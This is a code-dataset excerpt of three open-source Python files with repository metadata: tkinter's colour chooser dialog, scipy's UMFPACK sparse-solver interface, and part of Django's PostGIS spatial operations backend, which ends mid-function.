| bsd-3-clause | 2,495,115,237,138,690,000 | 19.276596 | 46 | 0.5383 | false |
Krossom/python-for-android | python3-alpha/python3-src/Lib/tkinter/colorchooser.py | 128 | 1793 | # tk common colour chooser dialogue
#
# this module provides an interface to the native color dialogue
# available in Tk 4.2 and newer.
#
# written by Fredrik Lundh, May 1997
#
# fixed initialcolor handling in August 1998
#
#
# options (all have default values):
#
# - initialcolor: colour to mark as selected when dialog is displayed
# (given as an RGB triplet or a Tk color string)
#
# - parent: which window to place the dialog on top of
#
# - title: dialog title
#
from tkinter.commondialog import Dialog
#
# color chooser class
class Chooser(Dialog):
"Ask for a color"
command = "tk_chooseColor"
def _fixoptions(self):
try:
# make sure initialcolor is a tk color string
color = self.options["initialcolor"]
if isinstance(color, tuple):
# assume an RGB triplet
self.options["initialcolor"] = "#%02x%02x%02x" % color
except KeyError:
pass
def _fixresult(self, widget, result):
# result can be somethings: an empty tuple, an empty string or
# a Tcl_Obj, so this somewhat weird check handles that
if not result or not str(result):
return None, None # canceled
# to simplify application code, the color chooser returns
# an RGB tuple together with the Tk color string
r, g, b = widget.winfo_rgb(result)
return (r/256, g/256, b/256), str(result)
#
# convenience stuff
def askcolor(color = None, **options):
"Ask for a color"
if color:
options = options.copy()
options["initialcolor"] = color
return Chooser(**options).show()
# --------------------------------------------------------------------
# test stuff
if __name__ == "__main__":
print("color", askcolor())
| apache-2.0 | 4,391,824,875,301,953,000 | 23.902778 | 70 | 0.607362 | false |
huard/scipy-work | scipy/sparse/linalg/dsolve/umfpack/umfpack.py | 2 | 23373 | """
Interface to the UMFPACK library.
--
Author: Robert Cimrman
"""
#from base import Struct, pause
import numpy as np
import scipy.sparse as sp
import re
try: # Silence import error.
import _umfpack as _um
except:
_um = None
assumeSortedIndices = False
##
# 10.01.2006, c
def configure( **kwargs ):
"""
Valid keyword arguments with defaults (other ignored):
assumeSortedIndices = False
Umfpack requires a CSR/CSC matrix to have sorted column/row indices. If
sure that the matrix fulfills this, pass assumeSortedIndices =
True to gain some speed.
"""
if 'assumeSortedIndices' in kwargs:
globals()['assumeSortedIndices'] = kwargs['assumeSortedIndices']
##
# 30.11.2005, c
def updateDictWithVars( adict, module, pattern, group = None ):
match = re.compile( pattern ).match
for name in [ii for ii in vars( module ).keys()
if match( ii )]:
if group is not None:
outName = match( name ).group( group )
else:
outName = name
adict[outName] = module.__dict__[name]
return adict
##
# How to list these automagically?
umfControls = [
'UMFPACK_PRL',
'UMFPACK_DENSE_ROW',
'UMFPACK_DENSE_COL',
'UMFPACK_BLOCK_SIZE',
'UMFPACK_STRATEGY',
'UMFPACK_2BY2_TOLERANCE',
'UMFPACK_FIXQ',
'UMFPACK_AMD_DENSE',
'UMFPACK_AGGRESSIVE',
'UMFPACK_PIVOT_TOLERANCE',
'UMFPACK_ALLOC_INIT',
'UMFPACK_SYM_PIVOT_TOLERANCE',
'UMFPACK_SCALE',
'UMFPACK_FRONT_ALLOC_INIT',
'UMFPACK_DROPTOL',
'UMFPACK_IRSTEP',
'UMFPACK_COMPILED_WITH_BLAS',
'UMFPACK_COMPILED_FOR_MATLAB',
'UMFPACK_COMPILED_WITH_GETRUSAGE',
'UMFPACK_COMPILED_IN_DEBUG_MODE',
'UMFPACK_STRATEGY_AUTO',
'UMFPACK_STRATEGY_UNSYMMETRIC',
'UMFPACK_STRATEGY_2BY2',
'UMFPACK_STRATEGY_SYMMETRIC',
'UMFPACK_SCALE_NONE',
'UMFPACK_SCALE_SUM',
'UMFPACK_SCALE_MAX',
]
umfInfo = [
'UMFPACK_STATUS',
'UMFPACK_NROW',
'UMFPACK_NCOL',
'UMFPACK_NZ',
'UMFPACK_SIZE_OF_UNIT',
'UMFPACK_SIZE_OF_INT',
'UMFPACK_SIZE_OF_LONG',
'UMFPACK_SIZE_OF_POINTER',
'UMFPACK_SIZE_OF_ENTRY',
'UMFPACK_NDENSE_ROW',
'UMFPACK_NEMPTY_ROW',
'UMFPACK_NDENSE_COL',
'UMFPACK_NEMPTY_COL',
'UMFPACK_SYMBOLIC_DEFRAG',
'UMFPACK_SYMBOLIC_PEAK_MEMORY',
'UMFPACK_SYMBOLIC_SIZE',
'UMFPACK_SYMBOLIC_TIME',
'UMFPACK_SYMBOLIC_WALLTIME',
'UMFPACK_STRATEGY_USED',
'UMFPACK_ORDERING_USED',
'UMFPACK_QFIXED',
'UMFPACK_DIAG_PREFERRED',
'UMFPACK_PATTERN_SYMMETRY',
'UMFPACK_NZ_A_PLUS_AT',
'UMFPACK_NZDIAG',
'UMFPACK_SYMMETRIC_LUNZ',
'UMFPACK_SYMMETRIC_FLOPS',
'UMFPACK_SYMMETRIC_NDENSE',
'UMFPACK_SYMMETRIC_DMAX',
'UMFPACK_2BY2_NWEAK',
'UMFPACK_2BY2_UNMATCHED',
'UMFPACK_2BY2_PATTERN_SYMMETRY',
'UMFPACK_2BY2_NZ_PA_PLUS_PAT',
'UMFPACK_2BY2_NZDIAG',
'UMFPACK_COL_SINGLETONS',
'UMFPACK_ROW_SINGLETONS',
'UMFPACK_N2',
'UMFPACK_S_SYMMETRIC',
'UMFPACK_NUMERIC_SIZE_ESTIMATE',
'UMFPACK_PEAK_MEMORY_ESTIMATE',
'UMFPACK_FLOPS_ESTIMATE',
'UMFPACK_LNZ_ESTIMATE',
'UMFPACK_UNZ_ESTIMATE',
'UMFPACK_VARIABLE_INIT_ESTIMATE',
'UMFPACK_VARIABLE_PEAK_ESTIMATE',
'UMFPACK_VARIABLE_FINAL_ESTIMATE',
'UMFPACK_MAX_FRONT_SIZE_ESTIMATE',
'UMFPACK_MAX_FRONT_NROWS_ESTIMATE',
'UMFPACK_MAX_FRONT_NCOLS_ESTIMATE',
'UMFPACK_NUMERIC_SIZE',
'UMFPACK_PEAK_MEMORY',
'UMFPACK_FLOPS',
'UMFPACK_LNZ',
'UMFPACK_UNZ',
'UMFPACK_VARIABLE_INIT',
'UMFPACK_VARIABLE_PEAK',
'UMFPACK_VARIABLE_FINAL',
'UMFPACK_MAX_FRONT_SIZE',
'UMFPACK_MAX_FRONT_NROWS',
'UMFPACK_MAX_FRONT_NCOLS',
'UMFPACK_NUMERIC_DEFRAG',
'UMFPACK_NUMERIC_REALLOC',
'UMFPACK_NUMERIC_COSTLY_REALLOC',
'UMFPACK_COMPRESSED_PATTERN',
'UMFPACK_LU_ENTRIES',
'UMFPACK_NUMERIC_TIME',
'UMFPACK_UDIAG_NZ',
'UMFPACK_RCOND',
'UMFPACK_WAS_SCALED',
'UMFPACK_RSMIN',
'UMFPACK_RSMAX',
'UMFPACK_UMIN',
'UMFPACK_UMAX',
'UMFPACK_ALLOC_INIT_USED',
'UMFPACK_FORCED_UPDATES',
'UMFPACK_NUMERIC_WALLTIME',
'UMFPACK_NOFF_DIAG',
'UMFPACK_ALL_LNZ',
'UMFPACK_ALL_UNZ',
'UMFPACK_NZDROPPED',
'UMFPACK_IR_TAKEN',
'UMFPACK_IR_ATTEMPTED',
'UMFPACK_OMEGA1',
'UMFPACK_OMEGA2',
'UMFPACK_SOLVE_FLOPS',
'UMFPACK_SOLVE_TIME',
'UMFPACK_SOLVE_WALLTIME',
'UMFPACK_ORDERING_COLAMD',
'UMFPACK_ORDERING_AMD',
'UMFPACK_ORDERING_GIVEN',
]
if _um:
##
# Export UMFPACK constants from _um.
umfDefines = updateDictWithVars( {}, _um, 'UMFPACK_.*' )
locals().update( umfDefines )
umfStatus = {
UMFPACK_OK : 'UMFPACK_OK',
UMFPACK_WARNING_singular_matrix : 'UMFPACK_WARNING_singular_matrix',
UMFPACK_WARNING_determinant_underflow : 'UMFPACK_WARNING_determinant_underflow',
UMFPACK_WARNING_determinant_overflow : 'UMFPACK_WARNING_determinant_overflow',
UMFPACK_ERROR_out_of_memory : 'UMFPACK_ERROR_out_of_memory',
UMFPACK_ERROR_invalid_Numeric_object : 'UMFPACK_ERROR_invalid_Numeric_object',
UMFPACK_ERROR_invalid_Symbolic_object : 'UMFPACK_ERROR_invalid_Symbolic_object',
UMFPACK_ERROR_argument_missing : 'UMFPACK_ERROR_argument_missing',
UMFPACK_ERROR_n_nonpositive : 'UMFPACK_ERROR_n_nonpositive',
UMFPACK_ERROR_invalid_matrix : 'UMFPACK_ERROR_invalid_matrix',
UMFPACK_ERROR_different_pattern : 'UMFPACK_ERROR_different_pattern',
UMFPACK_ERROR_invalid_system : 'UMFPACK_ERROR_invalid_system',
UMFPACK_ERROR_invalid_permutation : 'UMFPACK_ERROR_invalid_permutation',
UMFPACK_ERROR_internal_error : 'UMFPACK_ERROR_internal_error',
UMFPACK_ERROR_file_IO : 'UMFPACK_ERROR_file_IO',
}
umfSys = [
UMFPACK_A,
UMFPACK_At,
UMFPACK_Aat,
UMFPACK_Pt_L,
UMFPACK_L,
UMFPACK_Lt_P,
UMFPACK_Lat_P,
UMFPACK_Lt,
UMFPACK_U_Qt,
UMFPACK_U,
UMFPACK_Q_Ut,
UMFPACK_Q_Uat,
UMFPACK_Ut,
UMFPACK_Uat,
]
# Real, complex.
umfSys_transposeMap = [
{UMFPACK_A : UMFPACK_At,
UMFPACK_At : UMFPACK_A,
UMFPACK_Aat : UMFPACK_A},
{UMFPACK_A : UMFPACK_Aat,
UMFPACK_Aat : UMFPACK_A}
]
umfFamilyTypes = {'di' : int, 'dl' : long, 'zi' : int, 'zl' : long}
umfRealTypes = ('di', 'dl')
umfComplexTypes = ('zi', 'zl')
##
# 02.01.2005
class Struct( object ):
# 03.10.2005, c
# 26.10.2005
def __init__( self, **kwargs ):
if kwargs:
self.__dict__.update( kwargs )
# 08.03.2005
def __str__( self ):
ss = "%s\n" % self.__class__
for key, val in self.__dict__.iteritems():
if (issubclass( self.__dict__[key].__class__, Struct )):
ss += " %s:\n %s\n" % (key, self.__dict__[key].__class__)
else:
aux = "\n" + str( val )
aux = aux.replace( "\n", "\n " );
ss += " %s:\n%s\n" % (key, aux[1:])
return( ss.rstrip() )
##
# 30.11.2005, c
class UmfpackContext( Struct ):
##
# 30.11.2005, c
# 01.12.2005
# 21.12.2005
# 01.03.2006
def __init__( self, family = 'di', **kwargs ):
"""
Arguments:
family .. family of UMFPACK functions ('di', 'dl', 'zi', 'zl')
Keyword arguments:
maxCond .. if extimated condition number is greater than maxCond,
a warning is printed (default: 1e12)"""
if _um is None:
raise ImportError('Scipy was built without UMFPACK support. '
'You need to install the UMFPACK library and '
'header files before building scipy.')
self.maxCond = 1e12
Struct.__init__( self, **kwargs )
if family not in umfFamilyTypes.keys():
raise TypeError, 'wrong family: %s' % family
self.family = family
self.control = np.zeros( (UMFPACK_CONTROL, ), dtype = np.double )
self.info = np.zeros( (UMFPACK_INFO, ), dtype = np.double )
self._symbolic = None
self._numeric = None
self.mtx = None
self.isReal = self.family in umfRealTypes
##
# Functions corresponding to <family> are stored in self.funs.
pattern = 'umfpack_' + family + '_(.*)'
fn = updateDictWithVars( {}, _um, pattern, group = 1 )
self.funs = Struct( **fn )
self.funs.defaults( self.control )
self.control[UMFPACK_PRL] = 3
##
# 30.11.2005, c
def strControl( self ):
maxLen = max( [len( name ) for name in umfControls] )
format = '%%-%ds : %%d' % maxLen
aux = [format % (name, self.control[umfDefines[name]])
for name in umfControls if name in umfDefines]
return '\n'.join( aux )
##
# 01.12.2005, c
def strInfo( self ):
maxLen = max( [len( name ) for name in umfInfo] )
format = '%%-%ds : %%d' % maxLen
aux = [format % (name, self.info[umfDefines[name]])
for name in umfInfo if name in umfDefines]
return '\n'.join( aux )
##
# 30.11.2005, c
# 01.12.2005
# 14.12.2005
# 01.03.2006
def _getIndx( self, mtx ):
if sp.isspmatrix_csc( mtx ):
indx = mtx.indices
self.isCSR = 0
elif sp.isspmatrix_csr( mtx ):
indx = mtx.indices
self.isCSR = 1
else:
raise TypeError, 'must be a CSC/CSR matrix (is %s)' % mtx.__class__
##
# Should check types of indices to correspond to familyTypes.
if self.family[1] == 'i':
if (indx.dtype != np.dtype('i')) \
or mtx.indptr.dtype != np.dtype('i'):
raise ValueError, 'matrix must have int indices'
else:
if (indx.dtype != np.dtype('l')) \
or mtx.indptr.dtype != np.dtype('l'):
raise ValueError, 'matrix must have long indices'
if self.isReal:
if mtx.data.dtype != np.dtype('<f8'):
raise ValueError, 'matrix must have float64 values'
else:
if mtx.data.dtype != np.dtype('<c16'):
raise ValueError, 'matrix must have complex128 values'
return indx
##
# 30.11.2005, c
# last revision: 10.01.2007
def symbolic( self, mtx ):
"""Symbolic object (symbolic LU decomposition) computation for a given
sparsity pattern."""
self.free_symbolic()
indx = self._getIndx( mtx )
if not assumeSortedIndices:
# row/column indices cannot be assumed to be sorted
mtx.sort_indices()
if self.isReal:
status, self._symbolic\
= self.funs.symbolic( mtx.shape[0], mtx.shape[1],
mtx.indptr, indx, mtx.data,
self.control, self.info )
else:
real, imag = mtx.data.real.copy(), mtx.data.imag.copy()
status, self._symbolic\
= self.funs.symbolic( mtx.shape[0], mtx.shape[1],
mtx.indptr, indx,
real, imag,
self.control, self.info )
## print status, self._symbolic
if status != UMFPACK_OK:
raise RuntimeError, '%s failed with %s' % (self.funs.symbolic,
umfStatus[status])
self.mtx = mtx
##
# 30.11.2005, c
# 01.12.2005
# 02.12.2005
# 01.03.2006
def numeric( self, mtx ):
"""Numeric object (LU decomposition) computation using the
symbolic decomposition. The symbolic decomposition is (re)computed
if necessary."""
self.free_numeric()
if self._symbolic is None:
self.symbolic( mtx )
indx = self._getIndx( mtx )
failCount = 0
while 1:
if self.isReal:
status, self._numeric\
= self.funs.numeric( mtx.indptr, indx, mtx.data,
self._symbolic,
self.control, self.info )
else:
real, imag = mtx.data.real.copy(), mtx.data.imag.copy()
status, self._numeric\
= self.funs.numeric( mtx.indptr, indx,
real, imag,
self._symbolic,
self.control, self.info )
## print status, self._numeric
if status != UMFPACK_OK:
if status == UMFPACK_WARNING_singular_matrix:
print 'warning: singular matrix'
break
elif status in (UMFPACK_ERROR_different_pattern,
UMFPACK_ERROR_invalid_Symbolic_object):
# Try again.
print 'warning: recomputing symbolic'
self.symbolic( mtx )
failCount += 1
else:
failCount += 100
else:
break
if failCount >= 2:
raise RuntimeError, '%s failed with %s' % (self.funs.numeric,
umfStatus[status])
##
# 14.12.2005, c
def report_symbolic( self ):
"""Print information about the symbolic object. Output depends on
self.control[UMFPACK_PRL]."""
self.funs.report_symbolic( self._symbolic, self.control )
##
# 14.12.2005, c
def report_numeric( self ):
"""Print information about the numeric object. Output depends on
self.control[UMFPACK_PRL]."""
self.funs.report_numeric( self._numeric, self.control )
##
# 14.12.2005, c
def report_control( self ):
"""Print control values."""
self.funs.report_control( self.control )
##
# 14.12.2005, c
def report_info( self ):
"""Print all status information. Output depends on
self.control[UMFPACK_PRL]."""
self.funs.report_info( self.control, self.info )
##
# 30.11.2005, c
# 01.12.2005
def free_symbolic( self ):
if self._symbolic is not None:
self.funs.free_symbolic( self._symbolic )
self._symbolic = None
self.mtx = None
##
# 30.11.2005, c
# 01.12.2005
def free_numeric( self ):
if self._numeric is not None:
self.funs.free_numeric( self._numeric )
self._numeric = None
self.free_symbolic()
##
# 30.11.2005, c
def free( self ):
self.free_symbolic()
self.free_numeric()
##
# 30.11.2005, c
# 01.12.2005
# 02.12.2005
# 21.12.2005
# 01.03.2006
def solve( self, sys, mtx, rhs, autoTranspose = False ):
"""
Solution of system of linear equation using the Numeric object.
Arguments:
sys - one of UMFPACK system description constants, like
UMFPACK_A, UMFPACK_At, see umfSys list and UMFPACK
docs
mtx - sparse matrix (CSR or CSC)
rhs - right hand side vector
autoTranspose - automatically changes 'sys' to the
transposed type, if 'mtx' is in CSR, since UMFPACK
assumes CSC internally
"""
if sys not in umfSys:
raise ValueError, 'sys must be in' % umfSys
if autoTranspose and self.isCSR:
##
# UMFPACK uses CSC internally...
if self.family in umfRealTypes: ii = 0
else: ii = 1
if sys in umfSys_transposeMap[ii]:
sys = umfSys_transposeMap[ii][sys]
else:
raise RuntimeError, 'autoTranspose ambiguous, switch it off'
if self._numeric is not None:
if self.mtx is not mtx:
raise ValueError, 'must be called with same matrix as numeric()'
else:
raise RuntimeError, 'numeric() not called'
indx = self._getIndx( mtx )
if self.isReal:
rhs = rhs.astype( np.float64 )
sol = np.zeros( (mtx.shape[1],), dtype = np.float64 )
status = self.funs.solve( sys, mtx.indptr, indx, mtx.data, sol, rhs,
self._numeric, self.control, self.info )
else:
rhs = rhs.astype( np.complex128 )
sol = np.zeros( (mtx.shape[1],), dtype = np.complex128 )
mreal, mimag = mtx.data.real.copy(), mtx.data.imag.copy()
sreal, simag = sol.real.copy(), sol.imag.copy()
rreal, rimag = rhs.real.copy(), rhs.imag.copy()
status = self.funs.solve( sys, mtx.indptr, indx,
mreal, mimag, sreal, simag, rreal, rimag,
self._numeric, self.control, self.info )
sol.real, sol.imag = sreal, simag
#self.funs.report_info( self.control, self.info )
#pause()
if status != UMFPACK_OK:
if status == UMFPACK_WARNING_singular_matrix:
## Change inf, nan to zeros.
print 'zeroing nan and inf entries...'
sol[~np.isfinite( sol )] = 0.0
else:
raise RuntimeError, '%s failed with %s' % (self.funs.solve,
umfStatus[status])
econd = 1.0 / self.info[UMFPACK_RCOND]
if econd > self.maxCond:
print 'warning: (almost) singular matrix! '\
+ '(estimated cond. number: %.2e)' % econd
return sol
##
# 30.11.2005, c
# 01.12.2005
def linsolve( self, sys, mtx, rhs, autoTranspose = False ):
"""
One-shot solution of system of linear equation. Reuses Numeric object
if possible.
Arguments:
sys - one of UMFPACK system description constants, like
UMFPACK_A, UMFPACK_At, see umfSys list and UMFPACK
docs
mtx - sparse matrix (CSR or CSC)
rhs - right hand side vector
autoTranspose - automatically changes 'sys' to the
transposed type, if 'mtx' is in CSR, since UMFPACK
assumes CSC internally
"""
# print self.family
if sys not in umfSys:
raise ValueError, 'sys must be in' % umfSys
if self._numeric is None:
self.numeric( mtx )
else:
if self.mtx is not mtx:
self.numeric( mtx )
sol = self.solve( sys, mtx, rhs, autoTranspose )
self.free_numeric()
return sol
##
# 30.11.2005, c
# 01.12.2005
def __call__( self, sys, mtx, rhs, autoTranspose = False ):
"""
Uses solve() or linsolve() depending on the presence of the Numeric
object.
Arguments:
sys - one of UMFPACK system description constants, like
UMFPACK_A, UMFPACK_At, see umfSys list and UMFPACK
docs
mtx - sparse matrix (CSR or CSC)
rhs - right hand side vector
autoTranspose - automatically changes 'sys' to the
transposed type, if 'mtx' is in CSR, since UMFPACK
assumes CSC internally
"""
if self._numeric is not None:
return self.solve( sys, mtx, rhs, autoTranspose )
else:
return self.linsolve( sys, mtx, rhs, autoTranspose )
##
# 21.09.2006, added by Nathan Bell
def lu( self, mtx ):
"""
Returns an LU decomposition of an m-by-n matrix in the form
(L, U, P, Q, R, do_recip):
L - Lower triangular m-by-min(m,n) CSR matrix
U - Upper triangular min(m,n)-by-n CSC matrix
P - Vector of row permuations
Q - Vector of column permuations
R - Vector of diagonal row scalings
do_recip - boolean
For a given matrix A, the decomposition satisfies:
LU = PRAQ when do_recip is true
LU = P(R^-1)AQ when do_recip is false
"""
#this should probably be changed
mtx = mtx.tocsc()
self.numeric( mtx )
#first find out how much space to reserve
(status, lnz, unz, n_row, n_col, nz_udiag)\
= self.funs.get_lunz( self._numeric )
if status != UMFPACK_OK:
raise RuntimeError, '%s failed with %s' % (self.funs.get_lunz,
umfStatus[status])
#allocate storage for decomposition data
i_type = mtx.indptr.dtype
Lp = np.zeros( (n_row+1,), dtype = i_type )
Lj = np.zeros( (lnz,), dtype = i_type )
Lx = np.zeros( (lnz,), dtype = np.double )
Up = np.zeros( (n_col+1,), dtype = i_type )
Ui = np.zeros( (unz,), dtype = i_type )
Ux = np.zeros( (unz,), dtype = np.double )
P = np.zeros( (n_row,), dtype = i_type )
Q = np.zeros( (n_col,), dtype = i_type )
Dx = np.zeros( (min(n_row,n_col),), dtype = np.double )
Rs = np.zeros( (n_row,), dtype = np.double )
if self.isReal:
(status,do_recip) = self.funs.get_numeric( Lp,Lj,Lx,Up,Ui,Ux,
P,Q,Dx,Rs,
self._numeric )
if status != UMFPACK_OK:
raise RuntimeError, '%s failed with %s'\
% (self.funs.get_numeric, umfStatus[status])
L = sp.csr_matrix((Lx,Lj,Lp),(n_row,min(n_row,n_col)))
U = sp.csc_matrix((Ux,Ui,Up),(min(n_row,n_col),n_col))
R = Rs
return (L,U,P,Q,R,bool(do_recip))
else:
#allocate additional storage for imaginary parts
Lz = np.zeros( (lnz,), dtype = np.double )
Uz = np.zeros( (unz,), dtype = np.double )
Dz = np.zeros( (min(n_row,n_col),), dtype = np.double )
(status,do_recip) = self.funs.get_numeric(Lp,Lj,Lx,Lz,Up,Ui,Ux,Uz,
P,Q,Dx,Dz,Rs,
self._numeric)
if status != UMFPACK_OK:
raise RuntimeError, '%s failed with %s'\
% (self.funs.get_numeric, umfStatus[status])
Lxz = np.zeros( (lnz,), dtype = np.complex128 )
Uxz = np.zeros( (unz,), dtype = np.complex128 )
Dxz = np.zeros( (min(n_row,n_col),), dtype = np.complex128 )
Lxz.real,Lxz.imag = Lx,Lz
Uxz.real,Uxz.imag = Ux,Uz
Dxz.real,Dxz.imag = Dx,Dz
L = sp.csr_matrix((Lxz,Lj,Lp),(n_row,min(n_row,n_col)))
U = sp.csc_matrix((Uxz,Ui,Up),(min(n_row,n_col),n_col))
R = Rs
return (L,U,P,Q,R,bool(do_recip))
| bsd-3-clause | -3,374,012,773,880,658,400 | 31.827247 | 88 | 0.53027 | false |
jhg/django | django/contrib/gis/db/backends/postgis/operations.py | 7 | 15047 | import re
from django.conf import settings
from django.contrib.gis.db.backends.base.operations import \
BaseSpatialOperations
from django.contrib.gis.db.backends.postgis.adapter import PostGISAdapter
from django.contrib.gis.db.backends.utils import SpatialOperator
from django.contrib.gis.geometry.backend import Geometry
from django.contrib.gis.measure import Distance
from django.core.exceptions import ImproperlyConfigured
from django.db.backends.postgresql_psycopg2.operations import \
DatabaseOperations
from django.db.utils import ProgrammingError
from django.utils.functional import cached_property
from .models import PostGISGeometryColumns, PostGISSpatialRefSys
class PostGISOperator(SpatialOperator):
def __init__(self, geography=False, **kwargs):
# Only a subset of the operators and functions are available
# for the geography type.
self.geography = geography
super(PostGISOperator, self).__init__(**kwargs)
def as_sql(self, connection, lookup, *args):
if lookup.lhs.output_field.geography and not self.geography:
raise ValueError('PostGIS geography does not support the "%s" '
'function/operator.' % (self.func or self.op,))
return super(PostGISOperator, self).as_sql(connection, lookup, *args)
class PostGISDistanceOperator(PostGISOperator):
sql_template = '%(func)s(%(lhs)s, %(rhs)s) %(op)s %%s'
def as_sql(self, connection, lookup, template_params, sql_params):
if not lookup.lhs.output_field.geography and lookup.lhs.output_field.geodetic(connection):
sql_template = self.sql_template
if len(lookup.rhs) == 3 and lookup.rhs[-1] == 'spheroid':
template_params.update({'op': self.op, 'func': 'ST_Distance_Spheroid'})
sql_template = '%(func)s(%(lhs)s, %(rhs)s, %%s) %(op)s %%s'
else:
template_params.update({'op': self.op, 'func': 'ST_Distance_Sphere'})
return sql_template % template_params, sql_params
return super(PostGISDistanceOperator, self).as_sql(connection, lookup, template_params, sql_params)
class PostGISOperations(BaseSpatialOperations, DatabaseOperations):
name = 'postgis'
postgis = True
geography = True
geom_func_prefix = 'ST_'
version_regex = re.compile(r'^(?P<major>\d)\.(?P<minor1>\d)\.(?P<minor2>\d+)')
Adapter = PostGISAdapter
Adaptor = Adapter # Backwards-compatibility alias.
gis_operators = {
'bbcontains': PostGISOperator(op='~'),
'bboverlaps': PostGISOperator(op='&&', geography=True),
'contained': PostGISOperator(op='@'),
'contains': PostGISOperator(func='ST_Contains'),
'overlaps_left': PostGISOperator(op='&<'),
'overlaps_right': PostGISOperator(op='&>'),
'overlaps_below': PostGISOperator(op='&<|'),
'overlaps_above': PostGISOperator(op='|&>'),
'left': PostGISOperator(op='<<'),
'right': PostGISOperator(op='>>'),
'strictly_below': PostGISOperator(op='<<|'),
'stricly_above': PostGISOperator(op='|>>'),
'same_as': PostGISOperator(op='~='),
'exact': PostGISOperator(op='~='), # alias of same_as
'contains_properly': PostGISOperator(func='ST_ContainsProperly'),
'coveredby': PostGISOperator(func='ST_CoveredBy', geography=True),
'covers': PostGISOperator(func='ST_Covers', geography=True),
'crosses': PostGISOperator(func='ST_Crosses'),
'disjoint': PostGISOperator(func='ST_Disjoint'),
'equals': PostGISOperator(func='ST_Equals'),
'intersects': PostGISOperator(func='ST_Intersects', geography=True),
'overlaps': PostGISOperator(func='ST_Overlaps'),
'relate': PostGISOperator(func='ST_Relate'),
'touches': PostGISOperator(func='ST_Touches'),
'within': PostGISOperator(func='ST_Within'),
'dwithin': PostGISOperator(func='ST_DWithin', geography=True),
'distance_gt': PostGISDistanceOperator(func='ST_Distance', op='>', geography=True),
'distance_gte': PostGISDistanceOperator(func='ST_Distance', op='>=', geography=True),
'distance_lt': PostGISDistanceOperator(func='ST_Distance', op='<', geography=True),
'distance_lte': PostGISDistanceOperator(func='ST_Distance', op='<=', geography=True),
}
unsupported_functions = set()
function_names = {
'BoundingCircle': 'ST_MinimumBoundingCircle',
'MemSize': 'ST_Mem_Size',
'NumPoints': 'ST_NPoints',
}
def __init__(self, connection):
super(PostGISOperations, self).__init__(connection)
prefix = self.geom_func_prefix
self.area = prefix + 'Area'
self.bounding_circle = prefix + 'MinimumBoundingCircle'
self.centroid = prefix + 'Centroid'
self.collect = prefix + 'Collect'
self.difference = prefix + 'Difference'
self.distance = prefix + 'Distance'
self.distance_sphere = prefix + 'distance_sphere'
self.distance_spheroid = prefix + 'distance_spheroid'
self.envelope = prefix + 'Envelope'
self.extent = prefix + 'Extent'
self.extent3d = prefix + '3DExtent'
self.force_rhr = prefix + 'ForceRHR'
self.geohash = prefix + 'GeoHash'
self.geojson = prefix + 'AsGeoJson'
self.gml = prefix + 'AsGML'
self.intersection = prefix + 'Intersection'
self.kml = prefix + 'AsKML'
self.length = prefix + 'Length'
self.length3d = prefix + '3DLength'
self.length_spheroid = prefix + 'length_spheroid'
self.makeline = prefix + 'MakeLine'
self.mem_size = prefix + 'mem_size'
self.num_geom = prefix + 'NumGeometries'
self.num_points = prefix + 'npoints'
self.perimeter = prefix + 'Perimeter'
self.perimeter3d = prefix + '3DPerimeter'
self.point_on_surface = prefix + 'PointOnSurface'
self.polygonize = prefix + 'Polygonize'
self.reverse = prefix + 'Reverse'
self.scale = prefix + 'Scale'
self.snap_to_grid = prefix + 'SnapToGrid'
self.svg = prefix + 'AsSVG'
self.sym_difference = prefix + 'SymDifference'
self.transform = prefix + 'Transform'
self.translate = prefix + 'Translate'
self.union = prefix + 'Union'
self.unionagg = prefix + 'Union'
@cached_property
def spatial_version(self):
"""Determine the version of the PostGIS library."""
# Trying to get the PostGIS version because the function
# signatures will depend on the version used. The cost
# here is a database query to determine the version, which
# can be mitigated by setting `POSTGIS_VERSION` with a 3-tuple
# comprising user-supplied values for the major, minor, and
# subminor revision of PostGIS.
if hasattr(settings, 'POSTGIS_VERSION'):
version = settings.POSTGIS_VERSION
else:
# Run a basic query to check the status of the connection so we're
# sure we only raise the error below if the problem comes from
# PostGIS and not from PostgreSQL itself (see #24862).
self._get_postgis_func('version')
try:
vtup = self.postgis_version_tuple()
except ProgrammingError:
raise ImproperlyConfigured(
'Cannot determine PostGIS version for database "%s" '
'using command "SELECT postgis_lib_version()". '
'GeoDjango requires at least PostGIS version 2.0. '
'Was the database created from a spatial database '
'template?' % self.connection.settings_dict['NAME']
)
version = vtup[1:]
return version
def convert_extent(self, box, srid):
"""
Returns a 4-tuple extent for the `Extent` aggregate by converting
the bounding box text returned by PostGIS (`box` argument), for
example: "BOX(-90.0 30.0, -85.0 40.0)".
"""
if box is None:
return None
ll, ur = box[4:-1].split(',')
xmin, ymin = map(float, ll.split())
xmax, ymax = map(float, ur.split())
return (xmin, ymin, xmax, ymax)
def convert_extent3d(self, box3d, srid):
"""
Returns a 6-tuple extent for the `Extent3D` aggregate by converting
the 3d bounding-box text returned by PostGIS (`box3d` argument), for
example: "BOX3D(-90.0 30.0 1, -85.0 40.0 2)".
"""
if box3d is None:
return None
ll, ur = box3d[6:-1].split(',')
xmin, ymin, zmin = map(float, ll.split())
xmax, ymax, zmax = map(float, ur.split())
return (xmin, ymin, zmin, xmax, ymax, zmax)
def convert_geom(self, hex, geo_field):
"""
Converts the geometry returned from PostGIS aggretates.
"""
if hex:
return Geometry(hex, srid=geo_field.srid)
else:
return None
def geo_db_type(self, f):
"""
Return the database field type for the given geometry field.
Typically this is `None` because geometry columns are added via
the `AddGeometryColumn` stored procedure, unless the field
has been specified to be of geography type instead.
"""
if f.geography:
if f.srid != 4326:
raise NotImplementedError('PostGIS only supports geography columns with an SRID of 4326.')
return 'geography(%s,%d)' % (f.geom_type, f.srid)
else:
# Type-based geometries.
# TODO: Support 'M' extension.
if f.dim == 3:
geom_type = f.geom_type + 'Z'
else:
geom_type = f.geom_type
return 'geometry(%s,%d)' % (geom_type, f.srid)
def get_distance(self, f, dist_val, lookup_type):
"""
Retrieve the distance parameters for the given geometry field,
distance lookup value, and the distance lookup type.
This is the most complex implementation of the spatial backends due to
what is supported on geodetic geometry columns vs. what's available on
projected geometry columns. In addition, it has to take into account
the geography column type.
"""
# Getting the distance parameter and any options.
if len(dist_val) == 1:
value, option = dist_val[0], None
else:
value, option = dist_val
# Shorthand boolean flags.
geodetic = f.geodetic(self.connection)
geography = f.geography
if isinstance(value, Distance):
if geography:
dist_param = value.m
elif geodetic:
if lookup_type == 'dwithin':
raise ValueError('Only numeric values of degree units are '
'allowed on geographic DWithin queries.')
dist_param = value.m
else:
dist_param = getattr(value, Distance.unit_attname(f.units_name(self.connection)))
else:
# Assuming the distance is in the units of the field.
dist_param = value
